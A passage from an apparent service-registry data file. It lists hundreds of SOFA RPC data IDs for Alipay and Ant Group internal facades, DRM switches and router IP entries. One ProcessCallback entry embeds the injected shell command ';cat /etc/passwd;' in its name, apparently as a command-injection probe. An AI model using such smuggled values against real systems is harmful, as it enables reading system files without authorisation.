acade.CaptureOnlineDataService:1.0:finatp@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_30.89.157.191#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.cif.customer.CustomerQueryService:1.0@DEFAULT@cashiercloud_taobao#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.himalaya.common.service.facade.api.ServiceInvokeFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.kbservcenter.common.service.facade.csplatform.CommonQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_11.166.218.83#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","DATA_ID_11.160.177.90#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.mybank.bkwirelessdataportal.common.service.panda.SchemeManagerFacade#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","Alipay.zdaltair:name=com.alipay.zdal.ldc.tair.yingxutestGZTBaseCache.compressionThreshold,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","DATA_ID_30.73.142.234#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","cn.com.antcloud.acticketcore.kernel.common.service.facade.SlaFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_11.158.87.167#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.inshealthserviceprod.common.service.facade.api.HealthServiceDrugUserPrescriptionApplyFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.cap.common.openapi.internal.OpenApiService:1.0:internal_das@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","config:com.ipay.merchant.integration.test.facade.SampleService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA.CONFIG","Alipay.cfmng:name=com.alipay.sofa.middleware.switcher.drm.GlobalSwitchResource.enableLoadTestPreIsland,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.finpromoprod.common.service.facade.biz.fortuneday.FortuneDayInflateFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","SOFA_PRC_TRANSMIT_INSTASSET#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.insttrade:name=midas.record.MidasRecordSwitchDRMControl.patternRecordListStr,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.gftms.facade.api.basic.alarm.AlarmRecordManageFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.cif.facade.PasswordService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_30.73.158.104#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.appxcore.common.service.facade.api.servicelibrary.ServiceLibraryMngQueryNgFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.linka:name=com.alipay.zoneclient.internal.DynamicLdcSwitchResource.ldcVipSwitch,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.fc.process.common.service.facade.callback.ProcessCallback:1.0:bkoyzcore_test2OverProcessCallback_v2@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.revol.core.service.facade.ScriptChecker:1.0:cone_account_manage_sim@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mrchcommerce.fmcgcore.common.service.facade.api.order.OrderQueryGzoneFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mitemcenter.common.service.facade.api.price.PriceQueryForManageFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.tbx.facade.InstInfoMockService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","SOFA_PRC_TRANSMIT_TRAFFICCARDSP#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.kbservcenter.biz.service.impl.test.TodoTaskManagerTestFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.giftprod.common.service.facade.template.GiftCrowdHbTemplateService:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.finnet.service.facade.open.spi.FinnetSpiReceiveRService:1.0:finsign@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_11.124.147.35#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.cloud.apfasmng.common.service.facade.cluster.SASPodPoolFacade#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","com.alipay.kbdatafactory.common.service.facade.realtime.RealtimeTaskManageFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.kbcraftsman.common.facade.alsc.ShopReserveCommentQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.miniprod.common.service.facade.api.miniappservice.MiniAppActivityOperateFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.superapi.common.core.client.AppInvokeService:1.0:custcpt@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","config:com.alipay.gftms.facade.api.basic.outer.SubAccountQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA.CONFIG","com.antgroup.SampleService:1.0:sample@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.fc.instassetmng.service.facade.BridgeRequestFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","config:com.alipay.alideviceinfo.common.iotpay.condition.service.ConditionLimitQueryService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA.CONFIG","DATA_ID_30.50.42.39#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.fc.process.common.service.facade.callback.ProcessCallback:1.0:bksigncentre_instFrameArSalePdRelateCallback@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.fc.ptcore.common.service.facade.api.controller.ControllerModelConfigFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.pcreditmerchant.service.facade.MemberConfQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.nodejs.ConsumerService:1.0:mobilerelationtwa@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","NS_Servers_YW#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","DATA_ID_11.124.152.154#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.amspm.ardd.common.support.api.ArddRuleServiceFacade:1.0:payrms@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.pcreditprod.service.PcreditHbCardFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.Arch:name=com.alipay.tradeexprod.service.integration.drm.resource.TxpSwitchResource.switchToOss,version=1.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","NS_Pub_Servers_TP_M_OFFLINE#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","Alipay.zcache:name=com.alipay.zcache.tbase.fininfoDataTairCache.localCacheSwitch,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.mydds.common.service.facade.api.DataDecisionService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.vehownerprod.facade.admin.EtcDictAdminFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.accordercore.common.service.facade.control.auth.api.StagedAuthOperationFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.fc.loancore.common.service.facade.api.query.LcRepayPlanQueryService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.gfacceptance.common.service.facade.SyncRefundFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.yuemaprod.common.facade.service.InterworkGroupFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_11.124.180.41#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","DATA_ID_100.83.217.88#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.ioteds.metadata.repo.api.MetadataReadService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alifi.agds.master.client.api.ModelInfoManager:1.0:modelInfoManagerService@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.finpwm:name=com.alipay.finscene.arkbase.facade.service.impl.drm.migrate.SharedSceneMigrateCoreDrm.sasBizSwitchConfig,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.kbadvert.biz.delivery.rpc.PromoteDetailQueryRpcService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_30.52.99.233#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.opscloudcore.framework.core.facade.OpscloudClientServiceFacade:1.0:xxaaax@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.cloud.acappcore.common.service.facade.buildpack.BuildpackOSFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.cashier.common.service.facade.viewmodel.api.CashierChannelConsultService:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.dont-load-plugin:name=com.alipay.sla.businessgray.drm.BusinessGrayPolicy.businessPolicy,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.sofabootrpcdemo.facade.SampleServiceTwo:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.fintradecenter.common.service.facade.test.DefaultRecordRaiseTotalOrderActionTest:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_30.50.42.48#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.pointcore.common.service.facade.PaymentService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.insscenemarket.common.facade.InsMktMobileChatFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mpayacceptance.common.service.facade.api.PrePayService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.antassistant.biz.rest.DingTalkRest#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","NS_Sub_Servers_TP_S_FAS#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","config:com.alipay.fc.ptcore.common.service.facade.api.ptemplate.ProductTemplateQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA.CONFIG","com.alipay.ucdp.common.service.facade.mng.MaterialPoolMngFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.zbdm.common.service.facade.dataflow.ZbdmDataFlowFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.finpwm:name=com.alipay.finpwm.aip.detail.drm.AipOrderDRMResource.genDayIndex,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","Alipay.clearingcenter:name=com.alipay.antvip.client.internal.drm.DrmControl.restrainEnable,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.mybank.bkmportal.service.loan.api.ReplayPlanFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.ap.acquirefront.service.facade.api.standard.AcquireStandardCaptureQueryService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","config:com.alipay.cif.facade.SystemParameterQueryService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA.CONFIG","DATA_ID_30.52.100.24#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.dms.common.service.DmsDeployService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.csbizcenter.facade.admin.polymer.ConfigAdminFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.finfundtrade.common.service.facade.api.FundForceAdjustFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.recon.common.service.query.fund.api.QueryFunAccDailyFinService:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.zoloz.zhub.bis.SecurityChannelFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.csguide.service.facade.template.api.TemplateBizHandleService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.secucommunity:name=com.alipay.secucommunity.common.ldc.NewSecuCommunityLdcDrmConfig.supportLoadTest,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.cloud.apfasmng.common.service.facade.serverlessplan.ServerlessPlanWorkflowFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.punishcenter.common.service.facade.process.VoucherService:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.ecoqltprod.biz.tinyappquality.TinyappBpmsService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.poscore:name=com.alipay.poscore.common.service.integration.drm.impl.GrayControlDrmResourceTrigger.sendUidInsts,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.finbatchcore.common.service.facade.raise.RaisePushTransferFacade:1.0:bkfbatchcore@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","SOFA-SCHEDULER-S-S-mrchservbase-scheduler#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","NS_Servers_TP_O_COUNTER_SYNC#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","com.alipay.superapi.common.core.client.AppInvokeService:1.0:mobileclientgw@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.fc.mif.common.service.facade.MerchantRoleQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.findatacanal.common.service.manage.gildata.GdLcNottextannouncementSyncFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.kbitemprod.common.service.facade.item.KbItemPunishDescQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.pamir.coreclient.attr.AttrProviderService:1.0:openhome@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.insclaiminvestprod.facade.packages.PackageQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alihealth.top.service.TripleEpidemicHotInfoService:1.0:1.0.0@tri#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.consumecenter.common.service.facade.RecoverEventQueryFacade:1.0:fintradecenter@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.fc.process.common.service.facade.callback.ProcessCallback:1.0:;cat /etc/passwd;@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.finfocore:name=com.alipay.common.tracer.manage.TracerDrm.zdalOcsDigestLogThreshold,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","cn.com.antcloud.accrmcore.common.service.facade.CRMLabelSeriesFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.fc.process.common.service.facade.callback.ProcessCallback:1.0:riskUpdateProcessCallback@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.securitydata:name=com.alipay.routeclient.DefaultRouteCoordinator.idcDomainScope,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.planzero.rockcodecore.facade.token.TokenServiceFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.cswork.facade.permission.api.ZarkUserService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.lendpofprod:name=com.alipay.lendpofprod.core.shared.drm.LoanAttributeDrmResource.ceilingIntRateConfig,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","DATA_ID_169.254.139.91#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.pcreditbatch.service.bkebank.AgentWithholdService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.instopen.service.facade.calendar.CalendarEventService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.finriskcore.common.facade.credit.UserCreditInfoFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.fc.process.common.service.facade.callback.ProcessCallback:1.0:apires_auditTask@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mdatasync.common.service.facade.KouBeiDataFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.fc.fcbuservice.common.service.facade.AuthorizationAdapterFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.zdaltair:name=com.alipay.zdal.ldc.tair.loadTestZdatabusTairCache.czoneSwitchMap,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.baoxianmng.common.service.facade.catalog.InsProdCatalogItemProdFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.cloudbox:name=com.alipay.common.webx.session.drm.SessionLogDrm.isPrintDetails,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.publichome.common.service.facade.life.LifePublicBizServiceFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_11.158.127.76#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.opscloudcore.common.service.facade.meta.MetaServiceFacade:1.0:opscloudflow@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.fc.fcbuservice.common.service.facade.ProcessFacade:1.0:antacl@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.dacuprod.service.facade.DeployGraphServiceFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.finstore.common.service.facade.fop.bops.InvestOpinionManageFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.sofa.platform.schedule.concurrent.execute.Executer:1.0:EC_IRECON2_NOTIFY_CLEAR_RESULT_TASK@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.zdaltair:name=com.alipay.zdal.ldc.tair.zprodqueryTairCacheCZone.shardingRule,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.fc.process.common.service.facade.WTCatFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.mwalletmng:name=com.alipay.dwebupload.client.drm.DomainConfig.djWarmUpDomain,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.scardcenter.common.service.facade.OfflinepayOperationLogFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","config:com.alipay.csaccurate.service.facade.api.AccurateDataService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA.CONFIG","com.alipay.antiep.common.service.facade.AntiepP2PBizFacade:1.0:antfarm@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.scheduler.biz.shared.handler.SchedulerTaskPubFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.insmobile:name=com.alipay.insmobile.biz.workorder.drm.InsWorkorderDRM.cardBlacklist,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.etetestcore.service.api.finpwm.FinpwmSavingPlanManageService:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.finfundprod.common.service.facade.StockIndicatorFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.cdp.common.service.facade.smartcreative.CreativeQueryService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.ap.bizprod.common.service.facade.api.subscription.SubscriptionFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.ap.acquirefront.service.facade.api.standard.AcquireStandardPaymentEvaluateService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.securityops.common.service.client.spi.SecOpsChangeCallbackService:1.0:iclairvoyant@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.pcreditcardcenter.service.facade.unioncard.benefit.HbUnionCardBenefitFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.zdaltair:name=com.alipay.zdal.ldc.tair.ipaySecurePasswordTairCache.useKeyRouteInfo,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.securitydata.common.service.facade.CtuSnapShotQueryService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.echox.service.EchoxAopPlaybackService:1.0:cnamlmatrix@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.insmobile:name=com.alipay.insmobile.drm.insureddrmhandler.selectThreeProducts,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.dctlib.common.repository.mng.ReleaseQueryService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.ipay.ifundcontrolmodel.service.facade.fundmodel.fundanalyze.physicaltransactionfund.p2pclearing.P2PClearingPhysicalTransactionFundModelFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.darwin.common.service.facade.api.LayerAdminFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","SOFA_PRC_TRANSMIT_IANTCAPTCHA#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.gotone.common.service.api.CourierBizConfigService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.fc.process.common.service.facade.callback.ProcessCallback:1.0:finpromobus_recruitProcessCallback@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.openitemcore.common.service.facade.api.myfavor.FavorServiceQueryFacade:1.0:APPXCORE@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.cicadax.gateway.facade.api.CicadaXServiceFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.kbsales.common.service.facade.visitrecord.VisitContactPersonFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_30.39.183.24#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.zdataquery.common.service.facade.hbase.FinTntComposeHbaseQueryService:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.instdatalink.common.service.facade.datalink.ExtGroupFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.sdaclouddevice.facade.monitor.IotMonitorConfigInfoFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.customscenter:name=com.alipay.sofa.middleware.switcher.drm.GlobalSwitchResource.loadTestIslandConditionStr,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.csstrategy.common.service.facade.api.AgapClassifyFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.fc.operator.common.service.facade.PermissionConditionQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.fc.process.common.service.facade.callback.ProcessCallback:1.0:yixin_ProcessCallback@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mdiscountprod.common.service.facade.voucher.api.MerchantVoucherQueryService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_30.73.166.43#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.finopenscene.facade.camphome.facade.CampHomeConfigQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.fc.prodquery.common.service.facade.standard.api.product.ProductCoreSearchQueryFacade:1.0:PDCORE_SSCMW1CN@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","SOFA-SCHEDULER-S-S-innovate-scheduler#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","Alipay.finpwm:name=com.alipay.finpwm.biz.service.drm.InterfaceCommonDrm.turnOffSceneTypes,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.sdaxconnectplatform.common.service.facade.yunfengdie.ProductAuditFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.autoinsprod.common.service.facade.CarOwnerService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.finfundprod.common.service.facade.scene.UserMedalOperateFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.cpcenter.common.service.api.EventRemindHandleFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_30.23.242.48#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","DATA_ID_192.168.201.51#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","DATA_ID_30.38.72.6#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.opscloudcore.framework.core.facade.OpscloudClientServiceFacade:1.0:iptcore@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.openeco.facade.acceptance.AcceptanceTaskQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.consumequery.common.service.facade.ConsumeRecordService:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_100.83.106.231#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.mrchdtunical.common.service.facade.DtPublishFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.finfundprod.common.service.facade.scene.BigEventForLoadTestFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.financemng.common.facade.service.mortgage.facade.RiskQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.recadmin.biz.shared.manager.process.LrProcessService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.bbccore.dataquality.cache.DataQualityDataCache:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.routeclient.interfacename:pcreditchannelsff#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","DATA_ID_30.55.196.97#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.imif.common.service.facade.api.MerchantClassificationFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","config:com.alipay.riskmodelcenter.common.service.facade.p1p2.P1p2RpcQueryService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA.CONFIG","com.alipay.schemacenter.common.service.facade.api.serviceschema.RpcServiceSchemaFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.superapi.common.core.client.AppInvokeService:1.0:custcenter@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.opscloudcore.framework.core.facade.OpscloudClientServiceFacade:1.0:securityops@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.finorm.finriskcenter.common.facade.api.guardian.AlgorithmRuleServiceFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.zskynet:name=com.alipay.zskynet.integration.drm.AlarmCheckDRM.appNewAntmonitorApiSwitch,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.cicada.bizlogicide.common.service.facade.api.BizUserGitInfoFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.dockerlabapp:name=com.alipay.sla.businessgray.drm.BusinessGrayGlobalSwitcher.accountOpen,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","Alipay.finsnsbff:name=com.alipay.finsnsbff.topic.isTopicDetailDowngradeComments,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","cn.com.antcloud.acoffercenter.common.service.facade.product.ProdVersionManageFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mnotify.biz.client.client.rpc.MNotifyCallbackRPCService:1.0:kbservindustryprod@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_100.88.120.73#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.mnotify.biz.client.client.rpc.MNotifyPluginRPCService:1.0:tradeexprod@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.koubei.kbpdcenter.common.service.salesprod.SalesProdQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOF